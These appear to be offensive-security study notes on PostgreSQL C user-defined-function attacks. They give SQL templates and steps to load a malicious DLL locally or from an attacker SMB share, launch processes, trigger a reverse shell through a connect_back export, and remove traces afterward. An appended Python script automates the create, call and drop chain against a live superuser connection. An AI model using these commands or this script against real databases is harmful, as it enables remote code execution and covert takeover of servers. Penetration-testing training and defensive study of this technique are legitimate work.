0. PSQL Extensions attack - UDF

A C-language user-defined function (UDF) is how PostgreSQL loads arbitrary native code: CREATE FUNCTION ... LANGUAGE C names a shared library (DLL on Windows, .so on Linux) plus an exported symbol, and the server loads the library into its own process. Two requirements: the database user must be a superuser (only superusers may create C functions), and since PostgreSQL 8.2 the library must contain the PG_MODULE_MAGIC block, otherwise the load fails with "incompatible library ...: missing magic block". Template:

CREATE OR REPLACE FUNCTION test(text) RETURNS void AS 'FILENAME', 'test' LANGUAGE 'C' STRICT;


Old trick, Windows only: point the function straight at WinExec in kernel32.dll so no custom library is needed. This only works on PostgreSQL versions before 8.2; newer servers refuse kernel32.dll because it has no magic block, which is why the steps below compile a dedicated DLL instead.

CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS 'C:\Windows\System32\kernel32.dll', 'WinExec' LANGUAGE C STRICT;
SELECT system('hostname');



Steps: local attack

  1. Compile awae.dll from poc.c (local execution variant). The source must include PG_MODULE_MAGIC and export the function as awae.
  2. Create the function and call it. Dollar quoting ($$...$$) stands in for single-quoted string literals, so the statement contains no quote characters at all:
# From local machine (DLL already on the database host)
create or replace function test(text, integer) returns void as $$C:\awae.dll$$, $$awae$$ language C strict;
SELECT test($$calc.exe$$, 3);


# From remote machine (DLL served from an SMB share that the PostgreSQL service account can reach)
CREATE OR REPLACE FUNCTION remote_test(text, integer) RETURNS void AS $$\\192.168.119.120\awae\awae.dll$$, $$awae$$ LANGUAGE C STRICT;
SELECT remote_test($$calc.exe$$, 3);
  3. Stop and start the application to release the DLL.
    1. net stop "Applications Manager"
    2. Delete the DLL. While the service runs, the file is mapped into the database process and Windows keeps it locked, so it can only be removed after the stop.
    3. net start "Applications Manager"
  4. Delete the test function (DROP only removes the catalog entry; the library itself stays loaded until the server restarts, hence the previous step).
    1. DROP FUNCTION test(text, integer);
  5. Confirm calc.exe was spawned. It runs in the service's session, not on the desktop, so check the process list:
    1. tasklist | findstr -i calc.exe

Steps: reverse shell

  1. Compile awae2.dll from poc.c (reverse-shell variant, exporting connect_back).
  2. Create the function:
create or replace function test2(text) returns void as $$C:\awae2.dll$$, $$connect_back$$ language C strict;
  3. Execute the function. Because it is STRICT, a NULL argument would skip the call entirely, so pass any non-NULL value:
select test2('something');
  4. Python payload: remote execution script (py).
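The full chain from both procedures above (create the C function, call it, drop it) as an added example; this is not the page's poc.c nor the Python script the notes refer to, and it does not compile the DLL. It builds the dollar-quoted statements for a local or UNC library path, picking a dollar-quote tag that cannot collide with the payload, and runs them on any DB-API cursor (psycopg2 or similar). Function names, paths, the share address and the exported symbols are the placeholders from the notes, not live targets.

```python
# Added example (not the notes' poc.c or Python script): builds the
# CREATE FUNCTION / SELECT / DROP FUNCTION chain for a PostgreSQL C-language
# UDF and runs it through a DB-API cursor. All paths, hosts, function and
# symbol names below are placeholders taken from the notes.
import re
from typing import List, Sequence, Union

IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z_0-9]*$")


def dollar_quote(value: str) -> str:
    """Return value as a PostgreSQL dollar-quoted literal.

    $$...$$ is used when possible; if the value itself contains $$ a tag is
    chosen ($q1$...$q1$, $q2$...) that does not occur in the value. No single
    quotes are emitted, which matters when the injection point mangles them.
    """
    tag, n = "", 0
    while f"${tag}$" in value:
        n += 1
        tag = f"q{n}"
    return f"${tag}${value}${tag}$"


def sql_literal(arg: Union[str, int]) -> str:
    """Text arguments are dollar-quoted; integers are emitted as-is."""
    if isinstance(arg, bool) or not isinstance(arg, (str, int)):
        raise TypeError(f"unsupported argument type: {type(arg).__name__}")
    return str(arg) if isinstance(arg, int) else dollar_quote(arg)


def udf_chain(func: str, library: str, symbol: str,
              argtypes: Sequence[str], args: Sequence[Union[str, int]],
              rettype: str = "void") -> List[str]:
    r"""Statements to create, invoke and remove a C-language UDF.

    library: absolute local path (C:\awae.dll) or UNC path
    (\\host\share\awae.dll). A bare filename would instead be searched in
    dynamic_library_path. symbol: the name the DLL exports.
    Needs superuser, and the library must carry PG_MODULE_MAGIC.
    """
    if not IDENT_RE.match(func):
        raise ValueError(f"bad function name: {func!r}")
    if len(argtypes) != len(args):
        raise ValueError("argtypes and args length mismatch")
    sig = ", ".join(argtypes)
    create = (f"CREATE OR REPLACE FUNCTION {func}({sig}) RETURNS {rettype} "
              f"AS {dollar_quote(library)}, {dollar_quote(symbol)} LANGUAGE C STRICT;")
    call = f"SELECT {func}({', '.join(sql_literal(a) for a in args)});"
    # Cleanup removes the catalog entry only; the DLL stays mapped in the
    # server process until it restarts.
    drop = f"DROP FUNCTION {func}({sig});"
    return [create, call, drop]


def run_chain(cursor, statements: Sequence[str]) -> List[str]:
    """Execute statements in order on a DB-API cursor; return what was run."""
    done = []
    for stmt in statements:
        cursor.execute(stmt)
        done.append(stmt)
    return done


if __name__ == "__main__":
    # Local DLL on the database host (placeholder path from the notes):
    for s in udf_chain("test", r"C:\awae.dll", "awae",
                       ["text", "integer"], ["calc.exe", 3]):
        print(s)
    # Same export served from an SMB share the service account can reach:
    for s in udf_chain("remote_test", r"\\192.168.119.120\awae\awae.dll", "awae",
                       ["text", "integer"], ["calc.exe", 3]):
        print(s)
    # Reverse-shell export taking a single text argument:
    for s in udf_chain("test2", r"C:\awae2.dll", "connect_back",
                       ["text"], ["something"]):
        print(s)
```

To run it for real, open a psycopg2 connection as the superuser, enable autocommit, and pass `conn.cursor()` to run_chain with the list from udf_chain. For the UNC variant the PostgreSQL service account, not the SQL user, is what authenticates to the share.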